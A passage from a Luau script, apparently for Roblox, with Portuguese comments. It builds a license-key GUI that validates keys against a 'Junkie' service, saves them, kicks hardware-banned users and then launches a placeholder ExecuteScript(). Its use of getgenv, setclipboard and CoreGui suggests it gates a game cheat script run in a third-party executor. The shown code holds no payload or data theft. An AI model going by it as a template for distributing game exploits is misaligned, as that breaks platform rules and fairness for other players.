        TweenService:Create(progressBar, TweenInfo.new(duration, Enum.EasingStyle.Linear), {
            Size = UDim2.new(0, 0, 1, 0)
        }):Play()
        task.delay(duration, dismiss)
    end

    local clickButton = Instance.new("TextButton", frame)
    clickButton.Size = UDim2.new(1, 0, 1, 0)
    clickButton.BackgroundTransparency = 1
    clickButton.Text = ""
    clickButton.MouseButton1Click:Connect(dismiss)
end

-- ========================================
--          GUI DO KEY SYSTEM
-- ========================================
local function Build()
    local oldGui = CoreGui:FindFirstChild("ArqelKeySystem")
    if oldGui then oldGui:Destroy() end

    local mobile = isMobile()
    local scale = getScale()
    local sizes = Config.sizes
    local textSizes = Config.textSizes

    local windowWidth  = mobile and math.clamp(sizes.windowWidth * scale, 340, 450) or sizes.windowWidth
    local windowHeight = mobile and math.clamp(sizes.windowHeight * scale, 230, 280) or sizes.windowHeight
    local elementHeight = mobile and math.clamp(sizes.elementHeight * scale, 40, 50) or sizes.elementHeight
    local gap = sizes.gap
    local padding = sizes.padding

    local screenGui = Instance.new("ScreenGui")
    screenGui.Name = "ArqelKeySystem"
    screenGui.ZIndexBehavior = Enum.ZIndexBehavior.Sibling
    screenGui.ResetOnSpawn = false
    screenGui.IgnoreGuiInset = true
    screenGui.Parent = CoreGui

    local mainFrame = Instance.new("Frame")
    mainFrame.Size = UDim2.new(0, windowWidth, 0, windowHeight)
    mainFrame.Position = UDim2.new(0.5, 0, 1.5, 0)
    mainFrame.AnchorPoint = Vector2.new(0.5, 0.5)
    mainFrame.BackgroundColor3 = Config.colors.background
    mainFrame.BorderSizePixel = 0
    mainFrame.Parent = screenGui

    Instance.new("UICorner", mainFrame).CornerRadius = UDim.new(0, 12)

    local mainStroke = Instance.new("UIStroke", mainFrame)
    mainStroke.Color = Config.colors.accent
    mainStroke.Thickness = 1
    mainStroke.Transparency = 0.5

    local header = Instance.new("Frame", mainFrame)
    header.Size = UDim2.new(1, 0, 0, sizes.headerHeight)
    header.BackgroundColor3 = Config.colors.header
    header.BorderSizePixel = 0
    header.Active = true
    Instance.new("UICorner", header).CornerRadius = UDim.new(0, 12)

    local headerFix = Instance.new("Frame", header)
    headerFix.Size = UDim2.new(1, 0, 0, 16)
    headerFix.Position = UDim2.new(0, 0, 1, -16)
    headerFix.BackgroundColor3 = Config.colors.header
    headerFix.BorderSizePixel = 0

    local logo = Instance.new("ImageLabel", header)
    logo.Size = UDim2.new(0, 30, 0, 30)
    logo.Position = UDim2.new(0, padding, 0.5, 0)
    logo.AnchorPoint = Vector2.new(0, 0.5)
    logo.BackgroundTransparency = 1
    logo.Image = Config.logo_asset
    logo.ScaleType = Enum.ScaleType.Fit

    local titleLabel = Instance.new("TextLabel", header)
    titleLabel.Size = UDim2.new(1, -90, 1, 0)
    titleLabel.Position = UDim2.new(0, padding + 42, 0, 0)
    titleLabel.BackgroundTransparency = 1
    titleLabel.Text = Config.title
    titleLabel.TextColor3 = Config.colors.text
    titleLabel.TextSize = mobile and (textSizes.title - 2) or textSizes.title
    titleLabel.Font = Config.fonts.title
    titleLabel.TextXAlignment = Enum.TextXAlignment.Left

    local closeBtn = Instance.new("ImageButton", header)
    closeBtn.Size = UDim2.new(0, 18, 0, 18)
    closeBtn.Position = UDim2.new(1, -padding, 0.5, 0)
    closeBtn.AnchorPoint = Vector2.new(1, 0.5)
    closeBtn.BackgroundTransparency = 1
    closeBtn.Image = Icons.close
    closeBtn.ImageColor3 = Config.colors.textDim
    closeBtn.ScaleType = Enum.ScaleType.Fit

    closeBtn.MouseEnter:Connect(function()
        TweenService:Create(closeBtn, TweenInfo.new(0.15), {ImageColor3 = Config.colors.error}):Play()
    end)
    closeBtn.MouseLeave:Connect(function()
        TweenService:Create(closeBtn, TweenInfo.new(0.15), {ImageColor3 = Config.colors.textDim}):Play()
    end)
    closeBtn.MouseButton1Click:Connect(function()
        Notify("Goodbye", "See you next time!", 2, "close")
        TweenService:Create(mainFrame, TweenInfo.new(0.4, Enum.EasingStyle.Quart), {
            Position = UDim2.new(0.5, 0, -0.5, 0),
            BackgroundTransparency = 1
        }):Play()
        task.wait(0.4)
        screenGui:Destroy()
    end)

    local contentStartY = sizes.headerHeight + gap

    -- Status
    local statusFrame = Instance.new("Frame", mainFrame)
    statusFrame.Size = UDim2.new(sizes.elementWidth, 0, 0, elementHeight)
    statusFrame.Position = UDim2.new(0.5, 0, 0, contentStartY)
    statusFrame.AnchorPoint = Vector2.new(0.5, 0)
    statusFrame.BackgroundColor3 = Config.colors.input
    statusFrame.BorderSizePixel = 0
    Instance.new("UICorner", statusFrame).CornerRadius = UDim.new(0, sizes.cornerRadius)

    local statusIcon = Instance.new("ImageLabel", statusFrame)
    statusIcon.Size = UDim2.new(0, 20, 0, 20)
    statusIcon.Position = UDim2.new(0, 14, 0.5, 0)
    statusIcon.AnchorPoint = Vector2.new(0, 0.5)
    statusIcon.BackgroundTransparency = 1
    statusIcon.Image = Icons.lock
    statusIcon.ImageColor3 = Config.colors.statusIdle
    statusIcon.ScaleType = Enum.ScaleType.Fit

    local statusLabel = Instance.new("TextLabel", statusFrame)
    statusLabel.Size = UDim2.new(1, -50, 1, 0)
    statusLabel.Position = UDim2.new(0, 44, 0, 0)
    statusLabel.BackgroundTransparency = 1
    statusLabel.Text = "No key detected"
    statusLabel.TextColor3 = Config.colors.statusIdle
    statusLabel.TextSize = mobile and (textSizes.status - 1) or textSizes.status
    statusLabel.Font = Config.fonts.body
    statusLabel.TextXAlignment = Enum.TextXAlignment.Left
    statusLabel.TextTruncate = Enum.TextTruncate.AtEnd

    -- Input
    local inputStartY = contentStartY + elementHeight + gap
    local inputFrame = Instance.new("Frame", mainFrame)
    inputFrame.Size = UDim2.new(sizes.elementWidth, 0, 0, elementHeight)
    inputFrame.Position = UDim2.new(0.5, 0, 0, inputStartY)
    inputFrame.AnchorPoint = Vector2.new(0.5, 0)
    inputFrame.BackgroundColor3 = Config.colors.input
    inputFrame.BorderSizePixel = 0
    Instance.new("UICorner", inputFrame).CornerRadius = UDim.new(0, sizes.cornerRadius)

    local inputStroke = Instance.new("UIStroke", inputFrame)
    inputStroke.Color = Config.colors.accent
    inputStroke.Thickness = 1
    inputStroke.Transparency = 0.7

    local textBox = Instance.new("TextBox", inputFrame)
    textBox.Size = UDim2.new(1, -28, 1, 0)
    textBox.Position = UDim2.new(0, 14, 0.5, 0)
    textBox.AnchorPoint = Vector2.new(0, 0.5)
    textBox.BackgroundTransparency = 1
    textBox.Text = ""
    textBox.TextColor3 = Config.colors.text
    textBox.PlaceholderText = "Enter your license key..."
    textBox.PlaceholderColor3 = Config.colors.textDim
    textBox.TextSize = mobile and (textSizes.input - 1) or textSizes.input
    textBox.Font = Config.fonts.input
    textBox.ClearTextOnFocus = false
    textBox.TextTruncate = Enum.TextTruncate.AtEnd
    textBox.TextXAlignment = Enum.TextXAlignment.Left

    textBox.Focused:Connect(function()
        TweenService:Create(inputStroke, TweenInfo.new(0.15), {Transparency = 0.3}):Play()
    end)
    textBox.FocusLost:Connect(function()
        TweenService:Create(inputStroke, TweenInfo.new(0.15), {Transparency = 0.7}):Play()
    end)

    -- Botões
    local buttonStartY = inputStartY + elementHeight + gap
    local buttonRow = Instance.new("Frame", mainFrame)
    buttonRow.Size = UDim2.new(sizes.elementWidth, 0, 0, elementHeight)
    buttonRow.Position = UDim2.new(0.5, 0, 0, buttonStartY)
    buttonRow.AnchorPoint = Vector2.new(0.5, 0)
    buttonRow.BackgroundTransparency = 1

    local function createBtn(text, index, iconKey, isPrimary)
        local btn = Instance.new("TextButton", buttonRow)
        btn.Size = UDim2.new(1/3, -7, 1, 0)
        btn.Position = UDim2.new((index-1)/3, (index-1)*4, 0, 0)
        btn.BackgroundColor3 = isPrimary and Config.colors.button or Config.colors.input
        btn.BorderSizePixel = 0
        btn.Text = ""
        btn.AutoButtonColor = false
        Instance.new("UICorner", btn).CornerRadius = UDim.new(0, sizes.cornerRadius)

        if not isPrimary then
            local s = Instance.new("UIStroke", btn)
            s.Color = Config.colors.accent
            s.Thickness = 1
            s.Transparency = 0.7
        end

        local holder = Instance.new("Frame", btn)
        holder.Size = UDim2.new(1, 0, 1, 0)
        holder.BackgroundTransparency = 1
        local list = Instance.new("UIListLayout", holder)
        list.FillDirection = Enum.FillDirection.Horizontal
        list.HorizontalAlignment = Enum.HorizontalAlignment.Center
        list.VerticalAlignment = Enum.VerticalAlignment.Center
        list.Padding = UDim.new(0, 6)

        local ic = Instance.new("ImageLabel", holder)
        ic.Size = UDim2.new(0, 16, 0, 16)
        ic.BackgroundTransparency = 1
        ic.Image = Icons[iconKey] or Icons.key
        ic.ImageColor3 = Config.colors.text
        ic.ScaleType = Enum.ScaleType.Fit
        ic.LayoutOrder = 1

        local lbl = Instance.new("TextLabel", holder)
        lbl.Size = UDim2.new(0, 0, 0, 18)
        lbl.AutomaticSize = Enum.AutomaticSize.X
        lbl.BackgroundTransparency = 1
        lbl.Text = text
        lbl.TextColor3 = Config.colors.text
        lbl.TextSize = mobile and (textSizes.button - 1) or textSizes.button
        lbl.Font = Config.fonts.button
        lbl.LayoutOrder = 2

        local hoverColor = isPrimary and Config.colors.buttonHover or Config.colors.button
        btn.MouseEnter:Connect(function()
            TweenService:Create(btn, TweenInfo.new(0.15), {BackgroundColor3 = hoverColor}):Play()
        end)
        btn.MouseLeave:Connect(function()
            TweenService:Create(btn, TweenInfo.new(0.15), {BackgroundColor3 = btn.BackgroundColor3}):Play()
        end)

        return btn
    end

    local acquireBtn = createBtn("Acquire", 1, "key", false)
    local redeemBtn  = createBtn("Redeem",  2, "shield", true)
    local discordBtn = createBtn("Discord", 3, "discord", false)

    -- Status helper
    local spinConnection
    local dotsThread

    local function setStatus(state)
        if spinConnection then spinConnection:Disconnect() spinConnection = nil statusIcon.Rotation = 0 end
        if dotsThread then task.cancel(dotsThread) dotsThread = nil end

        local color, iconImg, text = Config.colors.statusIdle, Icons.lock, "No key detected"

        if state == "verifying" then
            color, iconImg, text = Config.colors.accent, Icons.loading, "Verifying license"
            spinConnection = RunService.Heartbeat:Connect(function(dt)
                statusIcon.Rotation = (statusIcon.Rotation + dt * 360) % 360
            end)
            local dots, i = {".", "..", "...", ""}, 1
            dotsThread = task.spawn(function()
                while statusLabel and statusLabel.Parent do
                    statusLabel.Text = text .. dots[i]
                    i = (i % #dots) + 1
                    task.wait(0.4)
                end
            end)
        elseif state == "success" then
            color, iconImg, text = Config.colors.success, Icons.check, "Access Granted"
        elseif state == "error" then
            color, iconImg, text = Config.colors.error, Icons.alert, "Invalid License"
        end

        TweenService:Create(statusLabel, TweenInfo.new(0.3), {TextColor3 = color}):Play()
        TweenService:Create(statusIcon, TweenInfo.new(0.3), {ImageColor3 = color}):Play()
        statusLabel.Text = text
        statusIcon.Image = iconImg
    end

    -- Redeem
    local function handleRedeem()
        local key = textBox.Text:gsub("%s+", "")
        if key == "" then Notify("Error", "Please enter your license key", 3, "warning") return end

        setStatus("verifying")
        redeemBtn.Active = false
        task.wait(0.3)

        local success, result = pcall(function() return Junkie.check_key(key) end)
        redeemBtn.Active = true

        if not success or not result then
            setStatus("error")
            Notify("Error", "Failed to connect to server", 3, "error")
            return
        end

        if result.valid then
            saveKey(key)
            getgenv().SCRIPT_KEY = key
            setStatus("success")
            Notify("Success", "License validated successfully!", 2, "success")
            task.wait(1)
            TweenService:Create(mainFrame, TweenInfo.new(0.4, Enum.EasingStyle.Quart), {
                Position = UDim2.new(0.5, 0, -0.5, 0),
                BackgroundTransparency = 1
            }):Play()
            task.wait(0.4)
            screenGui:Destroy()
            task.wait(0.5)
            ExecuteScript() -- ✅ CHAMA SEU SCRIPT AQUI
        else
            setStatus("error")
            local errorMessages = {
                KEY_INVALID = "Key not found in system", KEY_EXPIRED = "License has expired",
                HWID_BANNED = "Hardware banned", KEY_INVALIDATED = "License was revoked",
                ALREADY_USED = "One-time key already used", HWID_MISMATCH = "HWID limit reached",
                SERVICE_NOT_FOUND = "Service not found", SERVICE_MISMATCH = "Wrong service",
                PREMIUM_REQUIRED = "Premium required", ERROR = "Network error"
            }
            local errCode = result.error or "Unknown"
            Notify("Invalid", errorMessages[errCode] or result.message or errCode, 4, "error")
            if errCode == "HWID_BANNED" then
                task.wait(2)
                game.Players.LocalPlayer:Kick("Hardware banned from service")
            end
        end
    end

    acquireBtn.MouseButton1Click:Connect(function()
        Notify("Copied", "License link copied!", 3, "copy")
        pcall(function() setclipboard(Config.key_link) end)
    end)
    redeemBtn.MouseButton1Click:Connect(handleRedeem)
    discordBtn.MouseButton1Click:Connect(function()
        Notify("Discord", "Invite link copied!", 2, "discord")
        pcall(function() setclipboard(Config.discord_link) end)
    end)
    textBox.FocusLost:Connect(function(enter) if enter then handleRedeem() end end)

    -- Drag
    local dragging, dragStart, startPos = false, nil, nil
    header.InputBegan:Connect(function(input)
        if input.UserInputType == Enum.UserInputType.MouseButton1 or input.UserInputType == Enum.UserInputType.Touch then
            dragging = true
            dragStart = input.Position
            startPos = mainFrame.Position
            input.Changed:Connect(function()
                if input.UserInputState == Enum.UserInputState.End then dragging = false end
            end)
        end
    end)
    UserInputService.InputChanged:Connect(function(input)
        if dragging and (input.UserInputType == Enum.UserInputType.MouseMovement or input.UserInputType == Enum.UserInputType.Touch) then
            local delta = input.Position - dragStart
            mainFrame.Position = UDim2.new(startPos.X.Scale, startPos.X.Offset + delta.X, startPos.Y.Scale, startPos.Y.Offset + delta.Y)
        end
    end)

    TweenService:Create(mainFrame, TweenInfo.new(0.5, Enum.EasingStyle.Quart), {
        Position = UDim2.new(0.5, 0, 0.5, 0)
    }):Play()
end

-- ========================================
--         INICIALIZAÇÃO
-- ========================================
local savedKey = loadKey()

if savedKey then
    Notify("Checking", "Validating saved license...", 2, "shield")
    task.wait(0.3)
    local success, result = pcall(function() return Junkie.check_key(savedKey) end)
    if success and result and result.valid then
        getgenv().SCRIPT_KEY = savedKey
        Notify("Welcome Back", "License validated!", 2, "success")
        task.wait(1.5)
        ExecuteScript() -- ✅ CHAMA SEU SCRIPT AQUI TAMBÉM
    else
        clearKey()
        Notify("Expired", "Saved license is no longer valid", 3, "warning")
        task.wait(1)
        Build()
    end
else
    Build()
end